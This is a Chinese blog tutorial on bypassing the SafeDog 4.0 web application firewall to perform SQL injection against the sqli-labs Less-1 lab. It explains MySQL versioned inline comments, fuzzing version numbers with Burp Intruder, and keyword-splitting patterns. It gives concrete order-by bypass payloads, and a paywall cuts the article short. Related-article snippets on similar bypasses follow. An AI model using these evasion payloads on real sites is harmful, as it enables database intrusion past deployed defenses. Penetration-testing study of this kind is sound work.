sql注入绕过安全狗4.0

已于 2022-02-07 21:57:21 修改
阅读量5.2k 收藏 19
点赞数
分类专栏: web漏洞小知识 文章标签: 安全 sql web安全
于 2022-02-07 21:53:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43623271/article/details/122814962
版权

1.前言

该文章只进行技术分享与探讨,任何人进行非法操作与作者无关。

2.前置知识

/*!*/叫做内联注释,当!后面所接的数据库版本号时,当实际的版本等于或是高于那个字符串,应用程序就会将注释内容解释为SQL,否则就会当做注释来处理。默认的,当没有接版本号时,是会执行里面的内容的

比如版本号为5.7.26,当/*!00000xxx*/-/*!50726xxx*/里的注释内容都可以解析为sql语句执行
而>/*!50726xxx*/里的注释内容就真的被注释,失去作用。

3.绕过关键字主要思路

在关键字处使用内联注释和%23%0a(注释换行),内联注释里的版本号即使低于实际版本号有的可以绕过,有的不能绕过(可能是安全狗做了一点小过滤)
所以我们可以使用burpsuite的intruder模块检测一下哪些版本号可以绕过,这里以sqli-labs(Less-1)为例,把版本号设置为payload点
在这里插入图片描述
设置payload类型为numbers
在这里插入图片描述
然后开始重放
在这里插入图片描述
在这里插入图片描述
看到两种响应长度,就可以暂停了,有一种一定是能绕过安全狗的版本号
在这里插入图片描述
然后下面进行绕过的时候就使用那个能绕过的版本号

3.1绕过连体关键字思路

X代表关键字

X/*/A*/%23%0aX
X/*/A*/X
X/*/--A----/*/X
X/*!66666A*/%23%0aX
X/*!44444X*/
X/*!44444%23%0aX*/
/*!44444X/*!44444X*/

3.2绕过单个关键字思路

X代表关键字

/*!%23%0aX*/
/*!X%23%0a*/
/*!44444X*/
X与前面参数连在一起(不用空格隔开,这个也是绕过方法)

4.以sqli-labs(Less-1)为例,绕过安全狗

4.1拦截order by

1' order/*!%23%0aby*/ 3 %23
1' order/*!*/%23%0aby 3 %23
1' order/*/*/by 3%23
1' order/*//------/*/
最低0.47元/天 解锁文章
活着Viva
关注
  • 0
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
安全狗mysql_Fuzz绕过安全狗4.0实现SQL注入
weixin_42125192的博客
02-05 292
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
网站安全狗V4.0绕过姿势
干铮的博客
09-27 3895
网站安全狗下载地址: 网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改https://www.safedog.cn/website_safedog.html DVWA下载: 链接:https://pan.baidu.com/s/1XZXC3r_LhtY9s7xJM_NAYQ 提取码:kun6 --来自百度网盘超级会员V3的分享 已DVWA SQL注入为例对网站安全狗进行绕过测试。 1.查看安全狗防御规则匹配库。 2.绕过分析 字符 ...
记一次艰难的SQL注入(过安全狗)
白帽子凯哥聊黑客
05-29 1260
实战注入的难度比靶场大得多,各种绕过,各种骚操作。要学会利用搜索工具,更要学会选择性放弃。当一条路走不通就换另一种方法,也许就会柳暗花明又一村。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取。
sql注入绕过安全狗4.0版本
qq_18193739的博客
07-29 488
sql注入绕过安全狗4.0
记一次SQL注入绕过安全狗
weixin_51641247的博客
05-26 236
1、内联注释 可以绕过大多数情况2、在一些被拦截的地方多用/\*%23\*/和/\*!10440%0a\*/,有奇效。%23为#编码,%0A为换行一般来说,内联注释只有在紧跟版本号的情况下才有意义,其主要目的是通过版本号来控制部分语句在不同 MySQL 版本下的执行情况绕过原因:安全狗误以为/**/是注释的内容所以全部忽略。
mysql联合注入绕过安全狗4.0
https://www.cnblogs.com/zpchcbd/
05-13 1870
环境 win2003 apache mysql php 操作 http://192.168.1.131/Less-1/index.php?id=1 数值型注入 首先判断是否存在注入点 这里使用的是科学记数法 简单粗暴 http://192.168.1.131/Less-1/index.php?id=1e0 不变 http://192.168.1.131/Less-1/index.php?id=1...
绕过安全狗SQL注入
baynk的博客
08-06 3366
搞了几天CTF的注入后,熟悉了一些姿势,来尝试对安全狗进行绕过,发现出人意料的简单,主要是用来记录下当前安全绕过方式,反正过一段时间可能就不能用了。。。不做任何解释,仅做记录,原理基本上在之前的博客中都有写 实验环境 windows server 2008 phpstudy 安全狗V4.0.2395 实验前准备 开启phpstudy,这次和之前有点区别,由于要安装安全狗,所以在开启phpst...
SQL注入-过安全狗apache4.0
m0_60716947的博客
05-15 943
目录 一、安全狗的安装 二、Fuzz 三、过狗 (1)and 绕过 (2)order by 绕过 (3)union select 绕过 (4)database() 绕过 (5)获取其他库 (6)获得所有表 (7)获得所有字段 (8)获得数据 四、总结 一、安全狗的安装 这里有一篇很不错的文章,在安装的过程中出现的问题基本都能在里面找到解决方法 安全狗安装_YsterCcc的博客-CSDN博客_安全狗安装 如果还是不行就找一个装了phpstudy老版本的靶机,比如我上次写.
SQL注入 mysql4.0版本_技术讨论 | Fuzz绕过安全狗4.0实现SQL注入
weixin_39623411的博客
02-11 107
原标题:技术讨论 | Fuzz绕过安全狗4.0实现SQL注入0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4....
最新版安全狗(V4.0.2665) sql 注入绕过
qq_41891666的博客
12-01 1714
前言: 之前做测试的时候看见waf 就一脸懵逼,于是决定学一学waf bypass 的技术,这篇文章是关于bypass 安全狗来实现,看了网上的一些文章,然后自己搭了环境,动手实践一下,毕竟纸上得来终觉浅,绝知此事要躬行。 0x00 搭建安全狗环境 准备环境: 虚拟机 win 7 sp1 安全狗最新版本 V4.0.2665 phpstudy v8.1 坑: 安装安全狗的时候, 这个服务名怎么填都不对,网上的一些教程说把phpstudy 先修改为系统服务,但是问题是那是老版本的phpstudy ,现在使用的
SQL注入Bypass安全狗4.0.pdf
04-08
SQL注入攻击绕过安全狗4.0 SQL注入攻击是常见的Web应用安全漏洞之一,攻击者可以通过操纵SQL语句来访问或修改数据库中的数据。安全狗4.0是一款Web应用防火墙,可以检测和防止SQL注入攻击。但是,攻击者可以使用各种...
SQL注入 安全狗apache主程序版本v4.0.23137 绕过1
08-03
在这个特定的情况下,问题涉及的是安全狗apache主程序版本v4.0.23137的绕过策略。 描述中提到的“绕过1”意味着存在一个针对该版本的安全狗防护措施的规避方法,攻击者可以利用这个漏洞来执行未授权的SQL查询。以下...
网站安全狗IIS版 v4.0.14959
12-04
网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖网马/木马扫描、防SQL注入、防盗链、防黑链、防CC攻击、下载线程保护、IP黑白名单管理、实时流量监控、实时CPU...
10-sql注入-mysql注入1
08-03
- 简单的SQL注入检测函数,如文中示例,通过替换或正则匹配关键字来防止注入,但可以被大小写变换、%00编码等方式绕过。 - 使用`AND 1=1`和`AND 1=2`来判断注入点的存在,通过改变条件的真假来观察响应变化。 - `...
网站安全狗Apache版 v4.0.18089
10-30
网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖网马/木马扫描、防SQL注入、防盗链、防黑链、防CC攻击、下载线程...7、修复最新SQL注入绕过漏洞;网站安全狗Windows-
科普文:Linux系统安全加固指南
最新发布
为无为,事无事,味无味。
07-25 1193
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
sql的执行流程
qq_59395271的博客
07-24 1074
执行过程分成两层,一层是server层,主要进行连接服务,和分析语句,执行sql具体流程是 首先与用户通过连接器建立连接,然后将sql查询语句在查询缓存中查找,如果查找处理过相同的语句将,直接返回数据,给连接器,进而返回给用户,如果没有查到,则将sql语句发送给解析器,解析器中有词法分析和语法分析,通过这两个分析过程,创建对应的sql语法树,然后执行sql查询语句流程,首先经过预处理,优化器,执行计划,最后通过执行器,建立和存储引擎的连接。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 702
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
深入探究SQL注入:类型、防护与绕过策略
通过实例分析,学员可以掌握如何构造SQL注入语句并利用它来绕过服务器和应用程序的安全防护,例如Web应用防火墙(WAF)。 课程内容详细介绍了SQL注入的定义,它是如何通过恶意构造SQL代码来操纵应用程序的输入参数...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值